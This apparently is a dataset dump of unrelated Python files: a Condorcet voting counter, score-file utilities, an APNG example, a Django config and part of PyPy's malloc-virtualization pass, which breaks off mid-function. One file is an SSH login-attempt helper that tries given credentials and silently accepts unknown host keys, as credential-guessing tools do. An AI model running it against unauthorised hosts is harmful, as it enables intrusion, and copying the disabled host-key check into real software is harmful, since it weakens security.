content stringlengths 0 1.05M | origin stringclasses 2
values | type stringclasses 2
values |
|---|---|---|
# Inspired by:
# https://codereview.stackexchange.com/questions/42359/condorcet-voting-method-in-oop-python
# and https://github.com/bradbeattie/python-vote-core/tree/master/pyvotecore
import sys
import os
import itertools
def main():
file = sys.argv[1]
if not os.path.isfile(file):
print("File path {} does not exist. Exiting...".format(file))
sys.exit()
vote_results = get_data_from_file(file)
print("The votes are {}.".format(vote_results))
choices, scores = build_dict(vote_results)
results = matches_choices(choices, scores)
print("Pairwise results are {}.".format(results))
# return elect_winner(choices, results)
print("The winner is {}.".format(elect_winner(choices, results)))
def get_data_from_file(filepath):
"""
Parses data from input file
"""
vote_results = []
with open(filepath, encoding='utf-8') as file:
for lines in file:
if lines.startswith('#'):
pass
elif lines in ['\n', '\r\n']:
pass
else:
(one, two, three, four) = lines.split(None, 4)
vote_results.append((one, two, three, four))
return vote_results
def build_dict(votes):
"""
Builds a dictionary of scores
for each permutation of two choices
"""
choices = set()
scores = dict()
for voting in votes:
for choice in voting:
choices.add(choice)
for pair in list(itertools.permutations(voting, 2)):
if pair not in scores:
scores[pair] = 0
if voting.index(pair[0]) < voting.index(pair[1]):
scores[pair] += 1
return choices, scores
def matches_choices(choices, scores):
"""
Analyzes dictionary of scores and
gives the winner of each pair of choices
"""
results = dict()
for match in list(itertools.combinations(choices, 2)):
reverse = tuple(reversed(match))
if scores[match] > scores[reverse]:
results[match] = match[0]
else:
results[match] = match[1]
return results
def elect_winner(choices, results):
"""
If a choice is a winner against
every other choice, declares winner.
Does not detect Condorcet cycles
"""
for choice in choices:
choice_score = 0
for result in results:
if choice in result and results[result] == choice:
choice_score += 1
if choice_score == len(choices) - 1:
return choice
if __name__ == '__main__':
main()
| nilq/baby-python | python |
import os, time
def cmd(cmdd):
os.system(cmdd)
while(True):
time.sleep(2)
cmd("cls")
cmd("python app.py")
| nilq/baby-python | python |
import getpass
import sys
from constants import cx_status
import paramiko
# setup logging
paramiko.util.log_to_file("/tmp/paramiko.log")
# Paramiko client configuration
UseGSSAPI = ( paramiko.GSS_AUTH_AVAILABLE)
DoGSSAPIKeyExchange = ( paramiko.GSS_AUTH_AVAILABLE)
class SilentPolicy(paramiko.MissingHostKeyPolicy):
"""
Policy for ignoring an unknown host key, but
accepting it. This is used by `.SSHClient`.
"""
def missing_host_key(self, client, hostname, key):
pass
def try_login(hostname, port, username, password, verbose, timeout):
try:
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(SilentPolicy())
if verbose:
print("Trying to connect... {}/{}@{}:{}".format(username, password, hostname, port))
if not UseGSSAPI and not DoGSSAPIKeyExchange:
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except paramiko.ssh_exception.NoValidConnectionsError:
# closed port
return cx_status.NOT_LISTENING
except paramiko.ssh_exception.AuthenticationException:
return cx_status.ERROR
except Exception:
try:
client.close()
except Exception:
pass
# filtered port
return cx_status.NOT_LISTENING
else:
raise ("not tested code")
try:
client.connect( hostname, port, username, gss_auth=UseGSSAPI, gss_kex=DoGSSAPIKeyExchange,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except Exception:
password = getpass.getpass( "Password for %s@%s: " % (username, hostname))
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
try:
client.close()
except Exception:
pass
except Exception:
try:
client.close()
except Exception:
pass
return cx_status.ERROR
chan = client.invoke_shell()
chan.close()
client.close()
return cx_status.CONNECTED
except Exception as e:
print("*** Caught exception: %s: %s" % (e.__class__, e))
try:
client.close()
except:
pass
return cx_status.ERROR
| nilq/baby-python | python |
# Utilities for reading score-files
import numpy as np
from utils.data_loading import readlines_and_split_spaces
def load_scorefile_and_split_to_arrays(scorefile_path):
"""
Load a scorefile where each line has multiple columns
separated by whitespace, and split each column to its own
array
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
arrays = [np.array(column) for column in zip(*scorefile_lines)]
return arrays
def load_scorefile_and_split_scores(scorefile_path):
"""
Load a scorefile with following structure and
return three arrays: target_scores, nontarget_scores and original_scores
Each line is
is_target score [optional ...]
where is_target is either "True" or "False".
score is a float
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
target_scores = []
nontarget_scores = []
original_scores = []
for score_line in scorefile_lines:
# Some trials are None (because files are missing).
# Skip them
if score_line[1] == "None":
continue
is_target = score_line[0] == "True"
score = float(score_line[1])
original_scores.append(score)
if is_target:
target_scores.append(score)
else:
nontarget_scores.append(score)
target_scores = np.array(target_scores)
nontarget_scores = np.array(nontarget_scores)
original_scores = np.array(original_scores)
return target_scores, nontarget_scores, original_scores
| nilq/baby-python | python |
import numpy as np
from numpngw import write_apng
# Example 5
#
# Create an 8-bit RGB animated PNG file.
height = 20
width = 200
t = np.linspace(0, 10*np.pi, width)
seq = []
for phase in np.linspace(0, 2*np.pi, 25, endpoint=False):
y = 150*0.5*(1 + np.sin(t - phase))
a = np.zeros((height, width, 3), dtype=np.uint8)
a[:, :, 0] = y
a[:, :, 2] = y
seq.append(a)
write_apng("example5.png", seq, delay=50, use_palette=True)
| nilq/baby-python | python |
from django.apps import AppConfig
class TmplConfig(AppConfig):
name = 'tmpl'
| nilq/baby-python | python |
from rpython.flowspace.model import Variable, Constant, Block, Link
from rpython.flowspace.model import SpaceOperation, FunctionGraph, copygraph
from rpython.flowspace.model import checkgraph
from rpython.flowspace.model import c_last_exception
from rpython.translator.backendopt.support import log
from rpython.translator.simplify import join_blocks
from rpython.translator.unsimplify import varoftype
from rpython.rtyper.typesystem import getfunctionptr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
def virtualize_mallocs(translator, graphs, verbose=False):
newgraphs = graphs[:]
mallocv = MallocVirtualizer(newgraphs, translator.rtyper, verbose)
while mallocv.remove_mallocs_once():
pass
for graph in newgraphs:
checkgraph(graph)
join_blocks(graph)
assert newgraphs[:len(graphs)] == graphs
del newgraphs[:len(graphs)]
translator.graphs.extend(newgraphs)
# ____________________________________________________________
class MallocTypeDesc(object):
def __init__(self, MALLOCTYPE):
if not isinstance(MALLOCTYPE, lltype.GcStruct):
raise CannotRemoveThisType
self.MALLOCTYPE = MALLOCTYPE
self.check_no_destructor()
self.names_and_types = []
self.name2index = {}
self.name2subtype = {}
self.initialize_type(MALLOCTYPE)
#self.immutable_struct = MALLOCTYPE._hints.get('immutable')
def check_no_destructor(self):
STRUCT = self.MALLOCTYPE
try:
rttiptr = lltype.getRuntimeTypeInfo(STRUCT)
except ValueError:
return # ok
destr_ptr = getattr(rttiptr._obj, 'destructor_funcptr', None)
if destr_ptr:
raise CannotRemoveThisType
def initialize_type(self, TYPE):
fieldnames = TYPE._names
firstname, FIRSTTYPE = TYPE._first_struct()
if FIRSTTYPE is not None:
self.initialize_type(FIRSTTYPE)
fieldnames = fieldnames[1:]
for name in fieldnames:
FIELDTYPE = TYPE._flds[name]
if isinstance(FIELDTYPE, lltype.ContainerType):
raise CannotRemoveThisType("inlined substructure")
self.name2index[name] = len(self.names_and_types)
self.names_and_types.append((name, FIELDTYPE))
self.name2subtype[name] = TYPE
class SpecNode(object):
pass
class RuntimeSpecNode(SpecNode):
def __init__(self, name, TYPE):
self.name = name
self.TYPE = TYPE
def newvar(self):
v = Variable(self.name)
v.concretetype = self.TYPE
return v
def getfrozenkey(self, memo):
return 'R'
def accumulate_nodes(self, rtnodes, vtnodes):
rtnodes.append(self)
def copy(self, memo, flagreadonly):
return RuntimeSpecNode(self.name, self.TYPE)
def bind_rt_nodes(self, memo, newnodes_iter):
return newnodes_iter.next()
class VirtualSpecNode(SpecNode):
def __init__(self, typedesc, fields, readonly=False):
self.typedesc = typedesc
self.fields = fields # list of SpecNodes
self.readonly = readonly
def getfrozenkey(self, memo):
if self in memo:
return memo[self]
else:
memo[self] = len(memo)
result = [self.typedesc, self.readonly]
for subnode in self.fields:
result.append(subnode.getfrozenkey(memo))
return tuple(result)
def accumulate_nodes(self, rtnodes, vtnodes):
if self in vtnodes:
return
vtnodes[self] = True
for subnode in self.fields:
subnode.accumulate_nodes(rtnodes, vtnodes)
def copy(self, memo, flagreadonly):
if self in memo:
return memo[self]
readonly = self.readonly or self in flagreadonly
newnode = VirtualSpecNode(self.typedesc, [], readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.copy(memo, flagreadonly))
return newnode
def bind_rt_nodes(self, memo, newnodes_iter):
if self in memo:
return memo[self]
newnode = VirtualSpecNode(self.typedesc, [], self.readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.bind_rt_nodes(memo, newnodes_iter))
return newnode
class VirtualFrame(object):
def __init__(self, sourceblock, nextopindex,
allnodes, callerframe=None, calledgraphs={}):
if isinstance(allnodes, dict):
self.varlist = vars_alive_through_op(sourceblock, nextopindex)
self.nodelist = [allnodes[v] for v in self.varlist]
else:
assert nextopindex == 0
self.varlist = sourceblock.inputargs
self.nodelist = allnodes[:]
self.sourceblock = sourceblock
self.nextopindex = nextopindex
self.callerframe = callerframe
self.calledgraphs = calledgraphs
def get_nodes_in_use(self):
return dict(zip(self.varlist, self.nodelist))
def shallowcopy(self):
newframe = VirtualFrame.__new__(VirtualFrame)
newframe.varlist = self.varlist
newframe.nodelist = self.nodelist
newframe.sourceblock = self.sourceblock
newframe.nextopindex = self.nextopindex
newframe.callerframe = self.callerframe
newframe.calledgraphs = self.calledgraphs
return newframe
def copy(self, memo, flagreadonly={}):
newframe = self.shallowcopy()
newframe.nodelist = [node.copy(memo, flagreadonly)
for node in newframe.nodelist]
if newframe.callerframe is not None:
newframe.callerframe = newframe.callerframe.copy(memo,
flagreadonly)
return newframe
def enum_call_stack(self):
frame = self
while frame is not None:
yield frame
frame = frame.callerframe
def getfrozenkey(self):
memo = {}
key = []
for frame in self.enum_call_stack():
key.append(frame.sourceblock)
key.append(frame.nextopindex)
for node in frame.nodelist:
key.append(node.getfrozenkey(memo))
return tuple(key)
def find_all_nodes(self):
rtnodes = []
vtnodes = {}
for frame in self.enum_call_stack():
for node in frame.nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def find_rt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return rtnodes
def find_vt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return vtnodes
def copynodes(nodelist, flagreadonly={}):
memo = {}
return [node.copy(memo, flagreadonly) for node in nodelist]
def find_all_nodes(nodelist):
rtnodes = []
vtnodes = {}
for node in nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def is_trivial_nodelist(nodelist):
for node in nodelist:
if not isinstance(node, RuntimeSpecNode):
return False
return True
def bind_rt_nodes(srcnodelist, newnodes_list):
"""Return srcnodelist with all RuntimeNodes replaced by nodes
coming from newnodes_list.
"""
memo = {}
newnodes_iter = iter(newnodes_list)
result = [node.bind_rt_nodes(memo, newnodes_iter) for node in srcnodelist]
rest = list(newnodes_iter)
assert rest == [], "too many nodes in newnodes_list"
return result
class CannotVirtualize(Exception):
pass
class ForcedInline(Exception):
pass
class CannotRemoveThisType(Exception):
pass
# ____________________________________________________________
class MallocVirtualizer(object):
def __init__(self, graphs, rtyper, verbose=False):
self.graphs = graphs
self.rtyper = rtyper
self.excdata = rtyper.getexceptiondata()
self.graphbuilders = {}
self.specialized_graphs = {}
self.specgraphorigin = {}
self.inline_and_remove = {} # {graph: op_to_remove}
self.inline_and_remove_seen = {} # set of (graph, op_to_remove)
self.malloctypedescs = {}
self.count_virtualized = 0
self.verbose = verbose
self.EXCTYPE_to_vtable = self.build_obscure_mapping()
def build_obscure_mapping(self):
result = {}
for rinstance in self.rtyper.instance_reprs.values():
result[rinstance.lowleveltype.TO] = rinstance.rclass.getvtable()
return result
def report_result(self, progress):
if progress:
log.mallocv('removed %d mallocs so far' % self.count_virtualized)
else:
log.mallocv('done')
def enum_all_mallocs(self, graph):
for block in graph.iterblocks():
for op in block.operations:
if op.opname == 'malloc':
MALLOCTYPE = op.result.concretetype.TO
try:
self.getmalloctypedesc(MALLOCTYPE)
except CannotRemoveThisType:
pass
else:
yield (block, op)
elif op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.inline_and_remove:
yield (block, op)
def remove_mallocs_once(self):
self.flush_failed_specializations()
prev = self.count_virtualized
count_inline_and_remove = len(self.inline_and_remove)
for graph in self.graphs:
seen = {}
while True:
for block, op in self.enum_all_mallocs(graph):
if op.result not in seen:
seen[op.result] = True
if self.try_remove_malloc(graph, block, op):
break # graph mutated, restart enum_all_mallocs()
else:
break # enum_all_mallocs() exhausted, graph finished
progress1 = self.count_virtualized - prev
progress2 = len(self.inline_and_remove) - count_inline_and_remove
progress = progress1 or bool(progress2)
self.report_result(progress)
return progress
def flush_failed_specializations(self):
for key, (mode, specgraph) in self.specialized_graphs.items():
if mode == 'fail':
del self.specialized_graphs[key]
def fixup_except_block(self, exceptblock):
# hack: this block's inputargs may be missing concretetypes...
e1, v1 = exceptblock.inputargs
e1.concretetype = self.excdata.lltype_of_exception_type
v1.concretetype = self.excdata.lltype_of_exception_value
def getmalloctypedesc(self, MALLOCTYPE):
try:
dsc = self.malloctypedescs[MALLOCTYPE]
except KeyError:
dsc = self.malloctypedescs[MALLOCTYPE] = MallocTypeDesc(MALLOCTYPE)
return dsc
def try_remove_malloc(self, graph, block, op):
if (graph, op) in self.inline_and_remove_seen:
return False # no point in trying again
graphbuilder = GraphBuilder(self, graph)
if graph in self.graphbuilders:
graphbuilder.initialize_from_old_builder(self.graphbuilders[graph])
graphbuilder.start_from_a_malloc(graph, block, op.result)
try:
graphbuilder.propagate_specializations()
except CannotVirtualize, e:
self.logresult(op, 'failed', e)
return False
except ForcedInline, e:
self.logresult(op, 'forces inlining', e)
self.inline_and_remove[graph] = op
self.inline_and_remove_seen[graph, op] = True
return False
else:
self.logresult(op, 'removed')
graphbuilder.finished_removing_malloc()
self.graphbuilders[graph] = graphbuilder
self.count_virtualized += 1
return True
def logresult(self, op, msg, exc=None): # only for nice log outputs
if self.verbose:
if exc is None:
exc = ''
else:
exc = ': %s' % (exc,)
chain = []
while True:
chain.append(str(op.result))
if op.opname != 'direct_call':
break
fobj = op.args[0].value._obj
op = self.inline_and_remove[fobj.graph]
log.mallocv('%s %s%s' % ('->'.join(chain), msg, exc))
elif exc is None:
log.dot()
def get_specialized_graph(self, graph, nodelist):
assert len(graph.getargs()) == len(nodelist)
if is_trivial_nodelist(nodelist):
return 'trivial', graph
if graph in self.specgraphorigin:
orggraph, orgnodelist = self.specgraphorigin[graph]
nodelist = bind_rt_nodes(orgnodelist, nodelist)
graph = orggraph
virtualframe = VirtualFrame(graph.startblock, 0, nodelist)
key = virtualframe.getfrozenkey()
try:
return self.specialized_graphs[key]
except KeyError:
self.build_specialized_graph(graph, key, nodelist)
return self.specialized_graphs[key]
def build_specialized_graph(self, graph, key, nodelist):
graph2 = copygraph(graph)
virtualframe = VirtualFrame(graph2.startblock, 0, nodelist)
graphbuilder = GraphBuilder(self, graph2)
specblock = graphbuilder.start_from_virtualframe(virtualframe)
specgraph = graph2
specgraph.name += '_mallocv'
specgraph.startblock = specblock
self.specialized_graphs[key] = ('call', specgraph)
try:
graphbuilder.propagate_specializations()
except ForcedInline, e:
if self.verbose:
log.mallocv('%s inlined: %s' % (graph.name, e))
self.specialized_graphs[key] = ('inline', None)
except CannotVirtualize, e:
if self.verbose:
log.mallocv('%s failing: %s' % (graph.name, e))
self.specialized_graphs[key] = ('fail', None)
else:
self.graphbuilders[specgraph] = graphbuilder
self.specgraphorigin[specgraph] = graph, nodelist
self.graphs.append(specgraph)
class GraphBuilder(object):
def __init__(self, mallocv, graph):
self.mallocv = mallocv
self.graph = graph
self.specialized_blocks = {}
self.pending_specializations = []
def initialize_from_old_builder(self, oldbuilder):
self.specialized_blocks.update(oldbuilder.specialized_blocks)
def start_from_virtualframe(self, startframe):
spec = BlockSpecializer(self)
spec.initialize_renamings(startframe)
self.pending_specializations.append(spec)
return spec.specblock
def start_from_a_malloc(self, graph, block, v_result):
assert v_result in [op.result for op in block.operations]
nodelist = []
for v in block.inputargs:
nodelist.append(RuntimeSpecNode(v, v.concretetype))
trivialframe = VirtualFrame(block, 0, nodelist)
spec = BlockSpecializer(self, v_result)
spec.initialize_renamings(trivialframe, keep_inputargs=True)
self.pending_specializations.append(spec)
self.pending_patch = (block, spec.specblock)
def finished_removing_malloc(self):
(srcblock, specblock) = self.pending_patch
srcblock.inputargs = specblock.inputargs
srcblock.operations = specblock.operations
srcblock.exitswitch = specblock.exitswitch
srcblock.recloseblock(*specblock.exits)
def create_outgoing_link(self, currentframe, targetblock,
nodelist, renamings, v_expand_malloc=None):
assert len(nodelist) == len(targetblock.inputargs)
#
if is_except(targetblock):
v_expand_malloc = None
while currentframe.callerframe is not None:
currentframe = currentframe.callerframe
newlink = self.handle_catch(currentframe, nodelist, renamings)
if newlink:
return newlink
else:
targetblock = self.exception_escapes(nodelist, renamings)
assert len(nodelist) == len(targetblock.inputargs)
if (currentframe.callerframe is None and
is_trivial_nodelist(nodelist)):
# there is no more VirtualSpecNodes being passed around,
# so we can stop specializing
rtnodes = nodelist
specblock = targetblock
else:
if is_return(targetblock):
v_expand_malloc = None
newframe = self.return_to_caller(currentframe, nodelist[0])
else:
targetnodes = dict(zip(targetblock.inputargs, nodelist))
newframe = VirtualFrame(targetblock, 0, targetnodes,
callerframe=currentframe.callerframe,
calledgraphs=currentframe.calledgraphs)
rtnodes = newframe.find_rt_nodes()
specblock = self.get_specialized_block(newframe, v_expand_malloc)
linkargs = [renamings[rtnode] for rtnode in rtnodes]
return Link(linkargs, specblock)
def return_to_caller(self, currentframe, retnode):
callerframe = currentframe.callerframe
if callerframe is None:
raise ForcedInline("return block")
nodelist = callerframe.nodelist
callerframe = callerframe.shallowcopy()
callerframe.nodelist = []
for node in nodelist:
if isinstance(node, FutureReturnValue):
node = retnode
callerframe.nodelist.append(node)
return callerframe
def handle_catch(self, catchingframe, nodelist, renamings):
if not self.has_exception_catching(catchingframe):
return None
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
exc_type = v_exc_type.value
elif isinstance(exc_value_node, VirtualSpecNode):
EXCTYPE = exc_value_node.typedesc.MALLOCTYPE
exc_type = self.mallocv.EXCTYPE_to_vtable[EXCTYPE]
else:
raise CannotVirtualize("raising non-constant exc type")
excdata = self.mallocv.excdata
assert catchingframe.sourceblock.exits[0].exitcase is None
for catchlink in catchingframe.sourceblock.exits[1:]:
if excdata.fn_exception_match(exc_type, catchlink.llexitcase):
# Match found. Follow this link.
mynodes = catchingframe.get_nodes_in_use()
for node, attr in zip(nodelist,
['last_exception', 'last_exc_value']):
v = getattr(catchlink, attr)
if isinstance(v, Variable):
mynodes[v] = node
#
nodelist = []
for v in catchlink.args:
if isinstance(v, Variable):
node = mynodes[v]
else:
node = getconstnode(v, renamings)
nodelist.append(node)
return self.create_outgoing_link(catchingframe,
catchlink.target,
nodelist, renamings)
else:
# No match at all, propagate the exception to the caller
return None
def has_exception_catching(self, catchingframe):
if catchingframe.sourceblock.exitswitch != c_last_exception:
return False
else:
operations = catchingframe.sourceblock.operations
assert 1 <= catchingframe.nextopindex <= len(operations)
return catchingframe.nextopindex == len(operations)
def exception_escapes(self, nodelist, renamings):
# the exception escapes
if not is_trivial_nodelist(nodelist):
# start of hacks to help handle_catch()
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
# cannot improve: handle_catch() would already be happy
# by seeing the exc_type as a constant
pass
elif isinstance(exc_value_node, VirtualSpecNode):
# can improve with a strange hack: we pretend that
# the source code jumps to a block that itself allocates
# the exception, sets all fields, and raises it by
# passing a constant type.
typedesc = exc_value_node.typedesc
return self.get_exc_reconstruction_block(typedesc)
else:
# cannot improve: handle_catch() will have no clue about
# the exception type
pass
raise CannotVirtualize("except block")
targetblock = self.graph.exceptblock
self.mallocv.fixup_except_block(targetblock)
return targetblock
def get_exc_reconstruction_block(self, typedesc):
exceptblock = self.graph.exceptblock
self.mallocv.fixup_except_block(exceptblock)
TEXC = exceptblock.inputargs[0].concretetype
TVAL = exceptblock.inputargs[1].concretetype
#
v_ignored_type = varoftype(TEXC)
v_incoming_value = varoftype(TVAL)
block = Block([v_ignored_type, v_incoming_value])
#
c_EXCTYPE = Constant(typedesc.MALLOCTYPE, lltype.Void)
v = varoftype(lltype.Ptr(typedesc.MALLOCTYPE))
c_flavor = Constant({'flavor': 'gc'}, lltype.Void)
op = SpaceOperation('malloc', [c_EXCTYPE, c_flavor], v)
block.operations.append(op)
#
for name, FIELDTYPE in typedesc.names_and_types:
EXACTPTR = lltype.Ptr(typedesc.name2subtype[name])
c_name = Constant(name)
c_name.concretetype = lltype.Void
#
v_in = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v_incoming_value], v_in)
block.operations.append(op)
#
v_field = varoftype(FIELDTYPE)
op = SpaceOperation('getfield', [v_in, c_name], v_field)
block.operations.append(op)
#
v_out = varoftype(EXACTPTR)
op = SpaceOperation('cast_pointer', [v], v_out)
block.operations.append(op)
#
v0 = varoftype(lltype.Void)
op = SpaceOperation('setfield', [v_out, c_name, v_field], v0)
block.operations.append(op)
#
v_exc_value = varoftype(TVAL)
op = SpaceOperation('cast_pointer', [v], v_exc_value)
block.operations.append(op)
#
exc_type = self.mallocv.EXCTYPE_to_vtable[typedesc.MALLOCTYPE]
c_exc_type = Constant(exc_type, TEXC)
block.closeblock(Link([c_exc_type, v_exc_value], exceptblock))
return block
def get_specialized_block(self, virtualframe, v_expand_malloc=None):
key = virtualframe.getfrozenkey()
specblock = self.specialized_blocks.get(key)
if specblock is None:
orgblock = virtualframe.sourceblock
assert len(orgblock.exits) != 0
spec = BlockSpecializer(self, v_expand_malloc)
spec.initialize_renamings(virtualframe)
self.pending_specializations.append(spec)
specblock = spec.specblock
self.specialized_blocks[key] = specblock
return specblock
def propagate_specializations(self):
while self.pending_specializations:
spec = self.pending_specializations.pop()
spec.specialize_operations()
spec.follow_exits()
class BlockSpecializer(object):
def __init__(self, graphbuilder, v_expand_malloc=None):
self.graphbuilder = graphbuilder
self.v_expand_malloc = v_expand_malloc
self.specblock = Block([])
def initialize_renamings(self, virtualframe, keep_inputargs=False):
# we make a copy of the original 'virtualframe' because the
# specialize_operations() will mutate some of its content.
virtualframe = virtualframe.copy({})
self.virtualframe = virtualframe
self.nodes = virtualframe.get_nodes_in_use()
self.renamings = {} # {RuntimeSpecNode(): Variable()}
if keep_inputargs:
assert virtualframe.varlist == virtualframe.sourceblock.inputargs
specinputargs = []
for i, rtnode in enumerate(virtualframe.find_rt_nodes()):
if keep_inputargs:
v = virtualframe.varlist[i]
assert v.concretetype == rtnode.TYPE
else:
v = rtnode.newvar()
self.renamings[rtnode] = v
specinputargs.append(v)
self.specblock.inputargs = specinputargs
def setnode(self, v, node):
assert v not in self.nodes
self.nodes[v] = node
def getnode(self, v):
if isinstance(v, Variable):
return self.nodes[v]
else:
return getconstnode(v, self.renamings)
def rename_nonvirtual(self, v, where=None):
if not isinstance(v, Variable):
return v
node = self.nodes[v]
if not isinstance(node, RuntimeSpecNode):
raise CannotVirtualize(where)
return self.renamings[node]
def expand_nodes(self, nodelist):
rtnodes, vtnodes = find_all_nodes(nodelist)
return [self.renamings[rtnode] for rtnode in rtnodes]
def specialize_operations(self):
newoperations = []
self.ops_produced_by_last_op = 0
# note that 'self.virtualframe' can be changed during the loop!
while True:
operations = self.virtualframe.sourceblock.operations
try:
op = operations[self.virtualframe.nextopindex]
self.virtualframe.nextopindex += 1
except IndexError:
break
meth = getattr(self, 'handle_op_' + op.opname,
self.handle_default)
newops_for_this_op = meth(op)
newoperations += newops_for_this_op
self.ops_produced_by_last_op = len(newops_for_this_op)
for op in newoperations:
if op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.virtualframe.calledgraphs:
raise CannotVirtualize("recursion in residual call")
self.specblock.operations = newoperations
def follow_exits(self):
block = self.virtualframe.sourceblock
self.specblock.exitswitch = self.rename_nonvirtual(block.exitswitch,
'exitswitch')
links = block.exits
catch_exc = self.specblock.exitswitch == c_last_exception
if not catch_exc and isinstance(self.specblock.exitswitch, Constant):
# constant-fold the switch
for link in links:
if link.exitcase == 'default':
break
if link.llexitcase == self.specblock.exitswitch.value:
break
else:
raise Exception("exit case not found?")
links = (link,)
self.specblock.exitswitch = None
if catch_exc and self.ops_produced_by_last_op == 0:
# the last op of the sourceblock did not produce any
# operation in specblock, so we need to discard the
# exception-catching.
catch_exc = False
links = links[:1]
assert links[0].exitcase is None # the non-exception-catching case
self.specblock.exitswitch = None
newlinks = []
for link in links:
is_catch_link = catch_exc and link.exitcase is not None
if is_catch_link:
extravars = []
for attr in ['last_exception', 'last_exc_value']:
v = getattr(link, attr)
if isinstance(v, Variable):
rtnode = RuntimeSpecNode(v, v.concretetype)
self.setnode(v, rtnode)
self.renamings[rtnode] = v = rtnode.newvar()
extravars.append(v)
linkargsnodes = [self.getnode(v1) for v1 in link.args]
#
newlink = self.graphbuilder.create_outgoing_link(
self.virtualframe, link.target, linkargsnodes,
self.renamings, self.v_expand_malloc)
#
if self.specblock.exitswitch is not None:
newlink.exitcase = link.exitcase
if hasattr(link, 'llexitcase'):
newlink.llexitcase = link.llexitcase
if is_catch_link:
newlink.extravars(*extravars)
newlinks.append(newlink)
self.specblock.closeblock(*newlinks)
def make_rt_result(self, v_result):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
v_new = newrtnode.newvar()
self.renamings[newrtnode] = v_new
return v_new
def make_const_rt_result(self, v_result, value):
newrtnode = RuntimeSpecNode(v_result, v_result.concretetype)
self.setnode(v_result, newrtnode)
if v_result.concretetype is not lltype.Void:
assert v_result.concretetype == lltype.typeOf(value)
c_value = Constant(value)
c_value.concretetype = v_result.concretetype
self.renamings[newrtnode] = c_value
def handle_default(self, op):
newargs = [self.rename_nonvirtual(v, op) for v in op.args]
constresult = try_fold_operation(op.opname, newargs,
op.result.concretetype)
if constresult:
self.make_const_rt_result(op.result, constresult[0])
return []
else:
newresult = self.make_rt_result(op.result)
return [SpaceOperation(op.opname, newargs, newresult)]
def handle_unreachable(self, op):
from rpython.rtyper.lltypesystem.rstr import string_repr
msg = 'unreachable: %s' % (op,)
ll_msg = string_repr.convert_const(msg)
c_msg = Constant(ll_msg, lltype.typeOf(ll_msg))
newresult = self.make_rt_result(op.result)
return [SpaceOperation('debug_fatalerror', [c_msg], newresult)]
def handle_op_getfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
self.setnode(op.result, node.fields[index])
return []
else:
return self.handle_default(op)
def handle_op_setfield(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
if node.readonly:
raise ForcedInline(op)
fieldname = op.args[1].value
index = node.typedesc.name2index[fieldname]
node.fields[index] = self.getnode(op.args[2])
return []
else:
return self.handle_default(op)
def handle_op_same_as(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_cast_pointer(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
node = self.getnode(op.args[0])
SOURCEPTR = lltype.Ptr(node.typedesc.MALLOCTYPE)
TARGETPTR = op.result.concretetype
try:
if lltype.castable(TARGETPTR, SOURCEPTR) < 0:
raise lltype.InvalidCast
except lltype.InvalidCast:
return self.handle_unreachable(op)
self.setnode(op.result, node)
return []
else:
return self.handle_default(op)
def handle_op_ptr_nonzero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, True)
return []
else:
return self.handle_default(op)
def handle_op_ptr_iszero(self, op):
node = self.getnode(op.args[0])
if isinstance(node, VirtualSpecNode):
self.make_const_rt_result(op.result, False)
return []
else:
return self.handle_default(op)
def handle_op_ptr_eq(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is node1)
return []
else:
return self.handle_default(op)
def handle_op_ptr_ne(self, op):
node0 = self.getnode(op.args[0])
node1 = self.getnode(op.args[1])
if (isinstance(node0, VirtualSpecNode) or
isinstance(node1, VirtualSpecNode)):
self.make_const_rt_result(op.result, node0 is not node1)
return []
else:
return self.handle_default(op)
def handle_op_malloc(self, op):
if op.result is self.v_expand_malloc:
MALLOCTYPE = op.result.concretetype.TO
typedesc = self.graphbuilder.mallocv.getmalloctypedesc(MALLOCTYPE)
virtualnode = VirtualSpecNode(typedesc, [])
self.setnode(op.result, virtualnode)
for name, FIELDTYPE in typedesc.names_and_types:
fieldnode = RuntimeSpecNode(name, FIELDTYPE)
virtualnode.fields.append(fieldnode)
c = Constant(FIELDTYPE._defl())
c.concretetype = FIELDTYPE
self.renamings[fieldnode] = c
self.v_expand_malloc = None # done
return []
else:
return self.handle_default(op)
def handle_op_direct_call(self, op):
graph = graph_called_by(op)
if graph is None:
return self.handle_default(op)
nb_args = len(op.args) - 1
assert nb_args == len(graph.getargs())
newnodes = [self.getnode(v) for v in op.args[1:]]
myframe = self.get_updated_frame(op)
mallocv = self.graphbuilder.mallocv
if op.result is self.v_expand_malloc:
# move to inlining the callee, and continue looking for the
# malloc to expand in the callee's graph
op_to_remove = mallocv.inline_and_remove[graph]
